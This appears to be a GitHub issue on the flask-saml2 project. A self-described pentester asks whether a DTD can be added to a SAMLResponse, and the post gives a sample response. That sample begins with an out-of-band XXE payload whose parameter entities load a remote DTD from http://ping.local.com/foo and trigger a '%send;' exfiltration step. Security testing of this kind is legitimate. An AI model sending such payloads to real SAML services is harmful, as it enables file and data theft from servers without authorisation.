flask-saml2
flask-saml2 copied to clipboard
Published
20 hours ago •
mx-moth
mx-moth
How to add a DTD to the SAMLResponse?
Hello,
Please I came across this awesome project of yours while pentesting, I have some questions ?
- When the IDP issues a SAMLResponse is it possible for a DTD declaration to be added to the beginning of the SAMLResponse ? Just like this;
<?xml version="1.0"?>
<!DOCTYPE data [<!ENTITY % remote SYSTEM "http://ping.local.com/foo"> %remote; %send;]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:9000/saml/acs/" ID="_b4e5466d30d343a39b281c89699558dd" InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8" IssueInstant="2021-05-09T21:54:51.309039+00:00" Version="2.0">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost:8000/saml/metadata.xml</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
...
</ds:Signature>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_79630753cb3f44158e5cae1849045bf3" IssueInstant="2021-05-09T21:54:51.309039+00:00" Version="2.0">
<saml:Issuer>http://localhost:8000/saml/metadata.xml</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
...
</ds:Signature>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="http://localhost:9000/saml/metadata.xml">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8" NotOnOrAfter="2021-05-09T22:09:51.309039+00:00" Recipient="http://localhost:9000/saml/acs/"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-05-09T21:51:51.309039+00:00" NotOnOrAfter="2021-05-09T22:09:51.309039+00:00">
<saml:AudienceRestriction>
<saml:Audience>http://localhost:9000/saml/metadata.xml</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-05-09T21:54:51.309039+00:00">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
<saml:AttributeStatement>
<saml:Attribute Name="foo" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue>bar</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
</saml:Assertion>
</samlp:Response>
Thanks for your help in the near future. Regards, @abrahack.
